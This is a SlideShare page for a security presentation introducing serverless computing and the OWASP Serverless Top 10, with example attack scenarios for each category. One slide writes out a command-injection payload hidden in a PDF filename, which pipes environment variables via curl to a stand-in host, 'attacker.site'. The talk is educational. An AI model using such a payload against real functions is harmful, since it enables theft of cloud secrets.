SlideShare a Scribd company logo

OWASP Serverless Top 10

Download as PPTX, PDF
C
Chandrapal Badshah

Presentation that introduces Serverless technology and gives a glimpse of all the OWASP Serverless Top 10 vulnerabilities with code examples.

Software
1 of 55
Serverless Top 10 INTRODUCTION TO
About me Chandrapal Badshah Security Enthusiast Build, Break, Build guy Would love to talk about plants ;) Contact: ● twitter.com/@bnchandrapal ● github.com/Chan9390
START WITH WHY - Simon Sinek
Once upon a time... Database Web Server CPU Memory Web Application Static Files
But ... Database Web Server CPU Memory Web Application Static Files
But ... Database Web Server CPU Memory Web Application Static Files Security: maintaining/updating operating system with security patches, WAF/firewall configuration, network monitoring, etc
CHANGED THE GAME
Introduction to Microservices
Introduction to Microservices Still a lot of manual work (depending on the deployment method) to scale it. Security tasks depend on the deployment method too.
Introduction to Serverless The phrase “serverless” doesn’t mean servers are no longer involved. It simply means that developers no longer have to think that much about them. Computing resources get used as services without having to manage around physical capabilities or limits. https://readwrite.com/2012/10/15/why-the-future-of-software-and-apps-is-serverless/
Introduction to Serverless https://martinfowler.com/bliki/Serverless.html
Cloud Providers
Serverless Tools & Frameworks
Who uses Serverless (AWS Lambda) https://aws.amazon.com/lambda/resources/customer-case-studies/
Features of Function-as-a-Service ➔ Stateless functions ➔ Complete abstraction ➔ Instant, Scalable and event-driven ➔ Pay for what you use ➔ Free trials (AWS lambda gives 1,000,000* lambda triggers for free every month) ➔ There is a default timeout ➔ The function guidelines are defined by the Cloud Service Provider ➔ Multiple Languages supported
DEMO - Deploying Serverless App
So simple right ?
What if … ?
One question ?
Do you think OWASP Serverless Top 10 vulnerabilities are different than OWASP Top 10 ?
Do you think OWASP Serverless Top 10 vulnerabilities are different than OWASP Top 10 ? ● The way the apps are created are similar to that of server based applications ● There’s not a lot of data from organizations on how they use serverless functions in production (and the security issues faced)
Let’s jump into OWASP Serverless Top 10
A1: Injection ● Serverless doesn’t only support HTTP triggers, they support cloud storage events, database changes, etc ● SQL/NoSQL injection ● OS Command Injection ● Code Injection - the severity depends on the permissions given to the vulnerable lambda function
An example scenario: CV filtering system User sends mail with CV attached Email reaches the server AWS SNS sends notification to Lambda Lambda gets the mail, parses it if there’s a PDF attachment
Can you see the bug ?
Checks if the file has file name Checks if the filename ends with .pdf Appends the filename with /tmp Executes a command pdftotext
Payload (to print the environment variables) foobar;env|curl -H "Content-Type: text/plain" -X POST -d @- http://attacker.site/collector #.pdf
A2: Broken Authentication ● Functions are Stateless ● Multiple entry points, services, events and triggers and no continuous flow - things can get worse ● Common example: the functions for internal use only are available to all
A3: Sensitive Data Exposure ● Depends on the architecture just like other server based applications ● Common example: having functions disclosing logs in some specific endpoint
A bug I recently found
A4: XML External Entity ● Insecure way of parsing XML files by the serverless function ● The exploitability may not always be fruitful
Vulnerable code …
Vulnerable code … Downloads the XML file from bucket and parses it.
The Payload ...
The result…
A5: Broken Access Control ● Functions with over privileges ● If functions are allowed to access anything on the cloud account, then attacker too if he exploits some vulnerability like code execution
A6: Security Misconfiguration ● Not just the function but how the function interacts with the environment ● Because of the complexity which is introduced due to increased features/functions, it’s very easy for security misconfiguration ● Can lead to DoS/timeouts ● Example: Public S3 buckets
A7: Cross Site Scripting (XSS) ● Most common bug affects serverless functions as well ● Mostly due to lack of user input sanitization
Find the bug… (scenario) User sends mail Email reaches the server AWS SNS sends notification to Lambda Lambda gets the mail, parses it and sends the message content to moderator dashboard
Find the bug…
Find the bug… Gets the message content Sends the message content to dashboard
A8: Insecure Deserialization ● Common in Python and NodeJS, but also affects Java and dotNET ● Mostly introduced due to insecure use of 3rd party libraries
Example Java payload
The payload in request…
And the result…
A9: Using components with known vulnerabilities ● Using dependencies which are insecure ● Most commonly found ● Not every vulnerability will affect serverless functions ● Doesn’t always guarantee you remote exploitation
A10: Insufficient Logging and Monitoring ● Serverless auditing is even more difficult than traditional web applications ● Since the client interacts directly with the serverless functions there is no place for implementing WAFs or any active monitoring systems ● This actually helps attackers
Lambda code
Lambda logs
Lambda Logs (in case of huge payload)
Resources OWASP Serverless Top 10: https://www.owasp.org/index.php/OWASP_Serverless_Top_10_Project OWASP Serverless Top 10 GitHub repo: https://github.com/OWASP/Serverless-Top-10-Project Serverless Security - Function-as-a-Service: https://www.youtube.com/watch?v=c5ZHPc_yG4g Securing Serverless Applications Step-by-step: https://www.youtube.com/watch?v=B3j4xql7we0 AWS Serverless Functions: https://github.com/aws-samples/aws-serverless-workshops PureSec Serverless Top 10: https://github.com/puresec/sas-top-10
Stay tuned ! Damn Vulnerable Serverless App on its way
Any Questions ?

Recommended

pwnd.sh
pwnd.shpwnd.sh
pwnd.shChandrapal Badshah
 
mod_security introduction at study2study #3
mod_security introduction at study2study #3mod_security introduction at study2study #3
mod_security introduction at study2study #3Naoya Nakazawa
 
Node JS reverse shell
Node JS reverse shellNode JS reverse shell
Node JS reverse shellMadhu Akula
 
Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Rahul
 
Automated Intrusion Detection and Response on AWS
Automated Intrusion Detection and Response on AWSAutomated Intrusion Detection and Response on AWS
Automated Intrusion Detection and Response on AWSTeri Radichel
 
Apache Struts2 CVE-2017-5638
Apache Struts2 CVE-2017-5638Apache Struts2 CVE-2017-5638
Apache Struts2 CVE-2017-5638Riyaz Walikar
 
Web & Cloud Security in the real world
Web & Cloud Security in the real worldWeb & Cloud Security in the real world
Web & Cloud Security in the real worldMadhu Akula
 
Mod security
Mod securityMod security
Mod securityShruthi Kamath
 

Recommended

pwnd.sh
pwnd.shpwnd.sh
pwnd.shChandrapal Badshah
 
mod_security introduction at study2study #3
mod_security introduction at study2study #3mod_security introduction at study2study #3
mod_security introduction at study2study #3Naoya Nakazawa
 
Node JS reverse shell
Node JS reverse shellNode JS reverse shell
Node JS reverse shellMadhu Akula
 
Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Rahul
 
Automated Intrusion Detection and Response on AWS
Automated Intrusion Detection and Response on AWSAutomated Intrusion Detection and Response on AWS
Automated Intrusion Detection and Response on AWSTeri Radichel
 
Apache Struts2 CVE-2017-5638
Apache Struts2 CVE-2017-5638Apache Struts2 CVE-2017-5638
Apache Struts2 CVE-2017-5638Riyaz Walikar
 
Web & Cloud Security in the real world
Web & Cloud Security in the real worldWeb & Cloud Security in the real world
Web & Cloud Security in the real worldMadhu Akula
 
Mod security
Mod securityMod security
Mod securityShruthi Kamath
 
Locking Down Your Cloud
Locking Down Your CloudLocking Down Your Cloud
Locking Down Your CloudTeri Radichel
 
Windows Security Crash Course
Windows Security Crash CourseWindows Security Crash Course
Windows Security Crash CourseUTD Computer Security Group
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationAnant Shrivastava
 
[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detailOWASP
 
Nodejs Security
Nodejs SecurityNodejs Security
Nodejs SecurityJason Ross
 
Web Application firewall-Mod security
Web Application firewall-Mod securityWeb Application firewall-Mod security
Web Application firewall-Mod securityRomansh Yadav
 
Mod Security
Mod SecurityMod Security
Mod SecurityAbhishek Singh
 
10 things I’ve learnt about web application security
10 things I’ve learnt about web application security10 things I’ve learnt about web application security
10 things I’ve learnt about web application securityJames Crowley
 
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017Madhu Akula
 
Equifax cyber attack contained by containers
Equifax cyber attack contained by containersEquifax cyber attack contained by containers
Equifax cyber attack contained by containersAqua Security
 
AWS Security Strategy
AWS Security StrategyAWS Security Strategy
AWS Security StrategyTeri Radichel
 
20 common security vulnerabilities and misconfiguration in Azure
20 common security vulnerabilities and misconfiguration in Azure20 common security vulnerabilities and misconfiguration in Azure
20 common security vulnerabilities and misconfiguration in AzureCheah Eng Soon
 
Infrastructure Security
Infrastructure SecurityInfrastructure Security
Infrastructure SecurityUTD Computer Security Group
 
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...Paula Januszkiewicz
 
[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?OWASP
 
How to create correlation rule for threat detection in RuSIEM
How to create correlation rule for threat detection in RuSIEMHow to create correlation rule for threat detection in RuSIEM
How to create correlation rule for threat detection in RuSIEMOlesya Shelestova
 
[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automationOWASP
 
Linux Security for Developers
Linux Security for DevelopersLinux Security for Developers
Linux Security for DevelopersMichael Boelen
 
Web Security Introduction Webserver hacking refers to ...
Web Security Introduction Webserver hacking refers to ...Web Security Introduction Webserver hacking refers to ...
Web Security Introduction Webserver hacking refers to ...webhostingguy
 
Web security: concepts and tools used by attackers
Web security: concepts and tools used by attackersWeb security: concepts and tools used by attackers
Web security: concepts and tools used by attackerstomasperezv
 
demo1
demo1demo1
demo1googli
 
Web security programming_ii
Web security programming_iiWeb security programming_ii
Web security programming_iigoogli
 

More Related Content

What's hot

Locking Down Your Cloud
Locking Down Your CloudLocking Down Your Cloud
Locking Down Your CloudTeri Radichel
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationAnant Shrivastava
 
[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detailOWASP
 
Nodejs Security
Nodejs SecurityNodejs Security
Nodejs SecurityJason Ross
 
Web Application firewall-Mod security
Web Application firewall-Mod securityWeb Application firewall-Mod security
Web Application firewall-Mod securityRomansh Yadav
 
10 things I’ve learnt about web application security
10 things I’ve learnt about web application security10 things I’ve learnt about web application security
10 things I’ve learnt about web application securityJames Crowley
 
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017Madhu Akula
 
Equifax cyber attack contained by containers
Equifax cyber attack contained by containersEquifax cyber attack contained by containers
Equifax cyber attack contained by containersAqua Security
 
AWS Security Strategy
AWS Security StrategyAWS Security Strategy
AWS Security StrategyTeri Radichel
 
20 common security vulnerabilities and misconfiguration in Azure
20 common security vulnerabilities and misconfiguration in Azure20 common security vulnerabilities and misconfiguration in Azure
20 common security vulnerabilities and misconfiguration in AzureCheah Eng Soon
 
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...Paula Januszkiewicz
 
[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?OWASP
 
How to create correlation rule for threat detection in RuSIEM
How to create correlation rule for threat detection in RuSIEMHow to create correlation rule for threat detection in RuSIEM
How to create correlation rule for threat detection in RuSIEMOlesya Shelestova
 
[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automationOWASP
 
Linux Security for Developers
Linux Security for DevelopersLinux Security for Developers
Linux Security for DevelopersMichael Boelen
 
Web Security Introduction Webserver hacking refers to ...
Web Security Introduction Webserver hacking refers to ...Web Security Introduction Webserver hacking refers to ...
Web Security Introduction Webserver hacking refers to ...webhostingguy
 
Web security: concepts and tools used by attackers
Web security: concepts and tools used by attackersWeb security: concepts and tools used by attackers
Web security: concepts and tools used by attackerstomasperezv
 

What's hot (20)

Locking Down Your Cloud
Locking Down Your CloudLocking Down Your Cloud
Locking Down Your Cloud
 
Windows Security Crash Course
Windows Security Crash CourseWindows Security Crash Course
Windows Security Crash Course
 
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
 
[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail
 
Nodejs Security
Nodejs SecurityNodejs Security
Nodejs Security
 
Web Application firewall-Mod security
Web Application firewall-Mod securityWeb Application firewall-Mod security
Web Application firewall-Mod security
 
Mod Security
Mod SecurityMod Security
Mod Security
 
10 things I’ve learnt about web application security
10 things I’ve learnt about web application security10 things I’ve learnt about web application security
10 things I’ve learnt about web application security
 
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
 
Equifax cyber attack contained by containers
Equifax cyber attack contained by containersEquifax cyber attack contained by containers
Equifax cyber attack contained by containers
 
AWS Security Strategy
AWS Security StrategyAWS Security Strategy
AWS Security Strategy
 
20 common security vulnerabilities and misconfiguration in Azure
20 common security vulnerabilities and misconfiguration in Azure20 common security vulnerabilities and misconfiguration in Azure
20 common security vulnerabilities and misconfiguration in Azure
 
Infrastructure Security
Infrastructure SecurityInfrastructure Security
Infrastructure Security
 
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
 
[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?
 
How to create correlation rule for threat detection in RuSIEM
How to create correlation rule for threat detection in RuSIEMHow to create correlation rule for threat detection in RuSIEM
How to create correlation rule for threat detection in RuSIEM
 
[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation
 
Linux Security for Developers
Linux Security for DevelopersLinux Security for Developers
Linux Security for Developers
 
Web Security Introduction Webserver hacking refers to ...
Web Security Introduction Webserver hacking refers to ...Web Security Introduction Webserver hacking refers to ...
Web Security Introduction Webserver hacking refers to ...
 
Web security: concepts and tools used by attackers
Web security: concepts and tools used by attackersWeb security: concepts and tools used by attackers
Web security: concepts and tools used by attackers
 

Similar to OWASP Serverless Top 10

Web security programming_ii
Web security programming_iiWeb security programming_ii
Web security programming_iigoogli
 
Web Security Programming I I
Web Security Programming I IWeb Security Programming I I
Web Security Programming I IPavu Jas
 
Web security programming_ii
Web security programming_iiWeb security programming_ii
Web security programming_iigoogli
 
DevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless SecurityDevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless SecurityAvi Shulman
 
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningCA API Management
 
Docebo: history of a journey from legacy to serverless
Docebo: history of a journey from legacy to serverlessDocebo: history of a journey from legacy to serverless
Docebo: history of a journey from legacy to serverlessAWS User Group Italy
 
Start Up Austin 2017: Security Crash Course and Best Pratices
Start Up Austin 2017: Security Crash Course and Best PraticesStart Up Austin 2017: Security Crash Course and Best Pratices
Start Up Austin 2017: Security Crash Course and Best PraticesAmazon Web Services
 
Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"
Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"
Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"Fwdays
 
DevSecCon Boston 2018: Inside an enterprise breach by Sam Bisbee
DevSecCon Boston 2018: Inside an enterprise breach by Sam BisbeeDevSecCon Boston 2018: Inside an enterprise breach by Sam Bisbee
DevSecCon Boston 2018: Inside an enterprise breach by Sam BisbeeDevSecCon
 
Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014Akash Mahajan
 
Serverless meetup Auckland #6
Serverless meetup Auckland #6Serverless meetup Auckland #6
Serverless meetup Auckland #6Myles Henaghan
 
Pentesting With Web Services in 2012
Pentesting With Web Services in 2012Pentesting With Web Services in 2012
Pentesting With Web Services in 2012Ishan Girdhar
 
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...Emerson Eduardo Rodrigues Von Staffen
 
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...Amazon Web Services
 
Building Serverless Microservices Using Serverless Framework on the Cloud
Building Serverless Microservices Using Serverless Framework on the CloudBuilding Serverless Microservices Using Serverless Framework on the Cloud
Building Serverless Microservices Using Serverless Framework on the CloudSrini Karlekar
 

Similar to OWASP Serverless Top 10 (20)

demo1
demo1demo1
demo1
 
Web security programming_ii
Web security programming_iiWeb security programming_ii
Web security programming_ii
 
Web Security Programming I I
Web Security Programming I IWeb Security Programming I I
Web Security Programming I I
 
Web security programming_ii
Web security programming_iiWeb security programming_ii
Web security programming_ii
 
DevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless SecurityDevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless Security
 
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And Hardening
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
 
Docebo: history of a journey from legacy to serverless
Docebo: history of a journey from legacy to serverlessDocebo: history of a journey from legacy to serverless
Docebo: history of a journey from legacy to serverless
 
Start Up Austin 2017: Security Crash Course and Best Pratices
Start Up Austin 2017: Security Crash Course and Best PraticesStart Up Austin 2017: Security Crash Course and Best Pratices
Start Up Austin 2017: Security Crash Course and Best Pratices
 
Going Serverless on AWS
Going Serverless on AWSGoing Serverless on AWS
Going Serverless on AWS
 
Cloud Computing basic
Cloud Computing basicCloud Computing basic
Cloud Computing basic
 
Operations: Security
Operations: SecurityOperations: Security
Operations: Security
 
Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"
Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"
Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"
 
DevSecCon Boston 2018: Inside an enterprise breach by Sam Bisbee
DevSecCon Boston 2018: Inside an enterprise breach by Sam BisbeeDevSecCon Boston 2018: Inside an enterprise breach by Sam Bisbee
DevSecCon Boston 2018: Inside an enterprise breach by Sam Bisbee
 
Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014
 
Serverless meetup Auckland #6
Serverless meetup Auckland #6Serverless meetup Auckland #6
Serverless meetup Auckland #6
 
Pentesting With Web Services in 2012
Pentesting With Web Services in 2012Pentesting With Web Services in 2012
Pentesting With Web Services in 2012
 
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
 
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
 
Building Serverless Microservices Using Serverless Framework on the Cloud
Building Serverless Microservices Using Serverless Framework on the CloudBuilding Serverless Microservices Using Serverless Framework on the Cloud
Building Serverless Microservices Using Serverless Framework on the Cloud
 

More from Chandrapal Badshah

Dangling DNS records takeover at scale
Dangling DNS records takeover at scaleDangling DNS records takeover at scale
Dangling DNS records takeover at scaleChandrapal Badshah
 
Detecting secrets in code committed to gitlab (in real time)
Detecting secrets in code committed to gitlab (in real time)Detecting secrets in code committed to gitlab (in real time)
Detecting secrets in code committed to gitlab (in real time)Chandrapal Badshah
 
How to get started in InfoSec ?
How to get started in InfoSec ?How to get started in InfoSec ?
How to get started in InfoSec ?Chandrapal Badshah
 
OSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet versionOSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet versionChandrapal Badshah
 
OSINT Mindset to protect your Organization
OSINT Mindset to protect your OrganizationOSINT Mindset to protect your Organization
OSINT Mindset to protect your OrganizationChandrapal Badshah
 
Solving OWASP MSTG CrackMe using Frida
Solving OWASP MSTG CrackMe using FridaSolving OWASP MSTG CrackMe using Frida
Solving OWASP MSTG CrackMe using FridaChandrapal Badshah
 
Pentesting Android Apps using Frida (Beginners)
Pentesting Android Apps using Frida (Beginners)Pentesting Android Apps using Frida (Beginners)
Pentesting Android Apps using Frida (Beginners)Chandrapal Badshah
 
Let’s hunt the target using OSINT
Let’s hunt the target using OSINTLet’s hunt the target using OSINT
Let’s hunt the target using OSINTChandrapal Badshah
 

More from Chandrapal Badshah (10)

Dangling DNS records takeover at scale
Dangling DNS records takeover at scaleDangling DNS records takeover at scale
Dangling DNS records takeover at scale
 
Detecting secrets in code committed to gitlab (in real time)
Detecting secrets in code committed to gitlab (in real time)Detecting secrets in code committed to gitlab (in real time)
Detecting secrets in code committed to gitlab (in real time)
 
How to get started in InfoSec ?
How to get started in InfoSec ?How to get started in InfoSec ?
How to get started in InfoSec ?
 
OSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet versionOSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet version
 
OSINT Mindset to protect your Organization
OSINT Mindset to protect your OrganizationOSINT Mindset to protect your Organization
OSINT Mindset to protect your Organization
 
Solving OWASP MSTG CrackMe using Frida
Solving OWASP MSTG CrackMe using FridaSolving OWASP MSTG CrackMe using Frida
Solving OWASP MSTG CrackMe using Frida
 
Pentesting Android Apps using Frida (Beginners)
Pentesting Android Apps using Frida (Beginners)Pentesting Android Apps using Frida (Beginners)
Pentesting Android Apps using Frida (Beginners)
 
Let’s hunt the target using OSINT
Let’s hunt the target using OSINTLet’s hunt the target using OSINT
Let’s hunt the target using OSINT
 
Web Application Firewall
Web Application FirewallWeb Application Firewall
Web Application Firewall
 
Netcat - A Swiss Army Tool
Netcat - A Swiss Army ToolNetcat - A Swiss Army Tool
Netcat - A Swiss Army Tool
 

Recently uploaded

Precise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalPrecise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalLionel Briand
 
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsSensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsChristian Birchler
 
Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)Ahmed Mater
 
英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作qr0udbr0
 
Powering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsPowering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsSafe Software
 
SpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtimeandrehoraa
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaHanief Utama
 
Cyber security and its impact on E commerce
Cyber security and its impact on E commerceCyber security and its impact on E commerce
Cyber security and its impact on E commercemanigoyal112
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Natan Silnitsky
 
What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...Technogeeks
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Andreas Granig
 
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...OnePlan Solutions
 
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样umasea
 
Odoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 EnterpriseOdoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 Enterprisepreethippts
 
A healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfA healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfMarharyta Nedzelska
 
Machine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their EngineeringMachine Learning Software Engineering Patterns and Their Engineering
Machine Learning Software Engineering Patterns and Their EngineeringHironori Washizaki
 
PREDICTING RIVER WATER QUALITY ppt presentation
PREDICTING RIVER WATER QUALITY ppt presentationPREDICTING RIVER WATER QUALITY ppt presentation
PREDICTING RIVER WATER QUALITY ppt presentationvaddepallysandeep122
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based projectAnoyGreter
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Velvetech LLC
 

Recently uploaded (20)

Precise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive GoalPrecise and Complete Requirements? An Elusive Goal
Precise and Complete Requirements? An Elusive Goal
 
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving CarsSensoDat: Simulation-based Sensor Dataset of Self-driving Cars
SensoDat: Simulation-based Sensor Dataset of Self-driving Cars
 
Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)
 
英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作
 
Powering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsPowering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data Streams
 
2.pdf Ejercicios de programación competitiva
2.pdf Ejercicios de programación competitiva2.pdf Ejercicios de programación competitiva
2.pdf Ejercicios de programación competitiva
 
SpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtime
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief Utama
 
Cyber security and its impact on E commerce
Cyber security and its impact on E commerceCyber security and its impact on E commerce
